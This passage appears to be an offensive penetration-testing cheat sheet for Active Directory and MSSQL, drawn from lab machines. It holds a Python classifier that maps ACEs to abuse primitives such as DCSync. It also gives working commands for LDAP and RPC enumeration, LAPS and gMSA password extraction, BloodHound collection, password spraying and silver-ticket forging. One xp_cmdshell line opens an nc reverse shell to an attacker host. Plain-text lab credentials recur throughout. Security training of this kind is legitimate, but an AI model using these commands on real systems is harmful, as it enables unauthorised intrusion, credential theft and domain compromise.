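# Well-known ObjectAceType GUIDs that scope a generic bit to a concrete abuse
SELF_MEMBERSHIP = 'bf9679c0-0de6-11d0-a285-00aa003049e2'         # validated write / member attribute
FORCE_CHANGE_PASSWORD = '00299570-246d-11d0-a768-00aa006e0529'   # User-Force-Change-Password
DS_REPL_GET_CHANGES = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
DS_REPL_GET_CHANGES_ALL = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
ALLOWED_TO_ACT = '3f78c3e5-f79a-46bd-a0b8-9d18116ddc79'          # msDS-AllowedToActOnBehalfOfOtherIdentity


def decode_mask(mask):
    """Names for an AccessMask, collapsing the combinations PowerView shows as GenericAll/GenericWrite."""
    if mask == GENERIC_ALL_MAPPED:
        return ['GenericAll']
    if mask == GENERIC_WRITE_MAPPED:
        return ['GenericWrite']
    return [name for bit, name in RIGHTS if mask & bit]


def classify_ace(mask, object_ace_type=None):
    """Map one ACE (mask + optional ObjectAceType GUID) to the abuse primitive used on this page."""
    guid = (object_ace_type or '').lower()
    if mask & 0x10000000 or mask & GENERIC_ALL_MAPPED == GENERIC_ALL_MAPPED:
        return 'GenericAll'
    if mask & 0x00080000:
        return 'WriteOwner'
    if mask & 0x00040000:
        return 'WriteDacl'
    if mask & 0x00000100:                 # extended rights, scoped by GUID
        if guid == FORCE_CHANGE_PASSWORD:
            return 'ForceChangePassword'
        if guid == DS_REPL_GET_CHANGES:
            return 'GetChanges'
        if guid == DS_REPL_GET_CHANGES_ALL:
            return 'GetChangesAll'
        if not guid:
            return 'AllExtendedRights'
    if mask & 0x40000020:                 # WriteProperty or GenericWrite
        if guid == ALLOWED_TO_ACT:
            return 'AddAllowedToAct'
        if guid == SELF_MEMBERSHIP:
            return 'AddMember'
        if not guid:
            return 'GenericWrite'
    if mask & 0x00000008 and guid in ('', SELF_MEMBERSHIP):
        return 'AddSelf'                  # validated write: add yourself to the group
    return 'None'


def can_dcsync(aces):
    """True when the ACEs on the domain head give replication rights (both GetChanges rights, or broader)."""
    prims = {classify_ace(m, g) for m, g in aces}
    return bool(prims & {'GenericAll', 'AllExtendedRights'}) or {'GetChanges', 'GetChangesAll'} <= prims


def parse_pv_aces(text):
    """Split PowerView's 'Key : Value' list output into one dict per ACE (blank line separates ACEs)."""
    aces, cur = [], {}
    for line in text.splitlines():
        if ' : ' not in line:
            if cur and not line.strip():
                aces.append(cur)
                cur = {}
            continue
        key, _, value = line.partition(' : ')
        cur[key.strip()] = value.strip()
    if cur:
        aces.append(cur)
    return aces


# Constructed sample, taken from the Get-DomainObjectAcl output shown above.
SAMPLE_ACE = """ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : 0x8
InheritanceType : None
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
"""


def primitives_from_pv(text):
    """(trustee, primitive) per ACE from PowerView output."""
    out = []
    for ace in parse_pv_aces(text):
        mask = int(ace.get('AccessMask', '0'), 0)
        out.append((ace.get('SecurityIdentifier'), classify_ace(mask, ace.get('ObjectAceType'))))
    return out
```

A bare Self (0x8) without a scoping GUID is reported as AddSelf; when PowerView shows an ObjectAceType, pass it as the second argument so that an ExtendedRight or WriteProperty bit is resolved to the specific primitive instead of the generic one.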
LdapSearch
#ldapsearch
ldapsearch -x -H ldap://10.10.176.146 -s base namingcontexts
ldapsearch -x -H ldap://10.10.176.146 -b "DC=oscp,DC=exam" -s sub "*"
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H ldap://hutch.offsec "(objectclass=*)"
#enumerate users (anonymous bind)
ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local" -s sub "*" | grep sAMAccountName: | cut -f2 -d" "
#domain lockout policy (anonymous bind)
ldapsearch -x -p 389 -h 10.10.10.169 -b "dc=megabank,dc=local" -s sub "*" | grep lock
#pull 'First Last' pairs from lines containing '#' (e.g. description fields) and turn them into first.last usernames
ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*" | grep "#" | grep -oE '\b\w+\s\w+\b' | sed 's/ /./g'
#authenticated=============================================
ldapsearch -x -H ldap://10.10.10.175 -s base '(objectclass=\*)' -w Thestrokes23 -D '[email protected]'
#lockout policy, authenticated
ldapsearch -D 'BLACKFIELD\support' -w '#00^BlackKnight' -p 389 -h 10.10.10.192 -b "dc=blackfield,dc=local" -s sub "*" | grep lockoutThreshold
windapsearch
#enumerate all object class on AD
python3 windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
#retrieve a list of users
python3 windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U > users
#check password stored in descriptions or other fields
windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U --full
Netexec
nxc ldap <ip> -u 'username' -p 'password' --query "(objectClass=*)" "*"
LAPS
ldapsearch
ldapsearch -x -H "ldap://192.168.188.122" -D "hutch\fmcsorley" -w "CrabSharkJellyfish192" -b "dc=hutch,dc=offsec" '(ms-MCS-AdmPwd=*)' ms-MCS-AdmPwd
GMSA
netexec
netexec ldap rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k --gmsa
Bloodhound
bloodhound-python -d rebound.htb -c all -u oorend -p '1GR8t@$$4u' -ns 10.10.11.231 --zip --dns-tcp --dns-timeout 10
nxc ldap 172.16.201.26 -u Tracy.White -p 'zqwj041FGX' --bloodhound -c all -ns <dns-ip>
rpcclient - 139/445
#login null session
rpcclient 10.10.10.161 -U '' -N
#enumerate users in the domain
rpcclient> enumdomusers
#query one user by RID (group, flags, description, logon info)
rpcclient> queryuser [rid_user]
#list all users with name, RID and description in one go
rpcclient> querydispinfo
#create users list
rpcclient -U "" <ip> -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep "0x" -v | tr -d '[]' > userlist.txt
#password spraying
for u in $(cat users | awk -F@ '{print $1}' | awk -F: '{print $2}'); do rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169 | grep Authority; done
#===================================authenticated
#enumerate user SID
rpcclient -U htb.local\\james%'J@m3s_P@ssW0rd!' 10.10.10.52
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
Ldaps
Enumerate the TLS certificate (3269 is the Global Catalog over TLS; use 636 for plain LDAPS)
openssl s_client -showcerts -connect 10.10.10.11:3269 | openssl x509 -noout -text
MSSQL - 1433
login (Windows/domain authentication, or a SQL login)
mssqlclient.py INLANEFREIGHT/[email protected] -windows-auth
impacket-mssqlclient MANTIS/admin:'m$$ql_S@_P@ssW0rd!'@10.10.10.52
Enable xp_cmdshell:
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;--
Get a shell (single quotes: with the default QUOTED_IDENTIFIER ON, a double-quoted string is parsed as an identifier):
EXEC xp_cmdshell 'C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe <ip> <port>';--
Impersonation
#logins that can be impersonated; switch with EXECUTE AS LOGIN = '<name>'
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
linked database:
select srvname from master..sysservers
srvname
--------------------------------------------------------------------------------
FALCONSQL
WANDASQL
#check if we are admin
select * from openquery("WANDASQL", 'SELECT is_srvrolemember(''sysadmin'')')
--------------------------------------------------------------------
0
list directories
EXEC xp_dirtree '\';
EXEC xp_dirtree '\inetpub\wwwroot';
Commands
#display version
SELECT @@version;
#display databases
SELECT name FROM sys.databases;
#display tables
SELECT * FROM offsec.information_schema.tables;
Manual code execution (same steps as above, EXECUTE form)
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
Forging a silver ticket for the MSSQL service to impersonate Administrator
To forge the service ticket we need:
the NT hash of the svc_mssql account (the account the MSSQL service runs as)
the domain SID
the SPN of the service we are requesting a ticket for
the name of the user we want to impersonate
forge the ticket
impacket-ticketer -nthash NTLM_HASH -domain-sid S-1-5-21-2330692793-3312915120-706255856 -dc-ip 10.10.105.115 -spn mssql/breachdc.breach.vl -domain breach.vl Administrator
......
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k breachdc.breach.vl -target-ip 10.10.105.115
SQL (BREACH\Administrator dbo@master)> enable_xp_cmdshell
SQL (BREACH\Administrator dbo@master)> xp_cmdshell whoami
output
----------------
breach\svc_mssql
NULL